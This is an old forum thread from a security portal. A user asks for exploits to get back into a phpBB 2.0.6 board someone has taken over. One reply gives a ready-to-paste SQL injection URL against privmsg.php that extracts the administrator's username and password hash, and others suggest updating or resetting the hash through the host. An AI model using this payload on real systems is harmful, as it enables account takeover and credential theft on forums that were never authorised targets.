|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpbb 2.0.6 |
|
Posted: Sun Nov 06, 2005 7:06 pm |
|
|
Spie |
Beginner |
|
|
Joined: Nov 06, 2005 |
Posts: 3 |
|
|
|
|
|
|
|
Any exploits for this?
A turk called "aLpTurkTegin"
has done it over and I need to get back in. |
|
|
|
|
Posted: Sun Nov 06, 2005 7:19 pm |
|
|
Chb |
Valuable expert |
|
|
Joined: Jul 23, 2005 |
Posts: 206 |
Location: Germany |
|
|
|
|
|
|
There are some vulnerabilities. Are you too lazy to update your board? The current version is btw 2.0.18...
Well, just google a bit and you'll find a few vulnerabilities which you can use to get in. |
|
|
|
|
Posted: Sun Nov 06, 2005 7:21 pm |
|
|
Spie |
Beginner |
|
|
Joined: Nov 06, 2005 |
Posts: 3 |
|
|
|
|
|
|
|
Yes, I Should have updated, but now i need to try and save as much as i can.
I've googled around and found a couple of things that look like cgi/peral scripts, not sure if there any good, |
|
|
|
|
Posted: Mon Nov 07, 2005 1:28 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
http://site.com/board/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
Use that if you can. Fill in the required details. If you have a way of logging in still then that will work.
Why not just go through your web host and change the md5 for your user in the phpbb_users table?
Shai-tan |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Mon Nov 07, 2005 5:30 am |
|
|
Spie |
Beginner |
|
|
Joined: Nov 06, 2005 |
Posts: 3 |
|
|
|
|
|
|
|
I only have ftp acess during the night, but the host is forgein so im asleep when i have acess.
My backup forum account is called LOK and the userid is 33 so what would I put? |
|
|
|
|
Posted: Mon Nov 07, 2005 6:18 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Nothing just use it the way it is after you login. And see what happens. Just enter the hole lot into the address bar.
Shai-tan |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|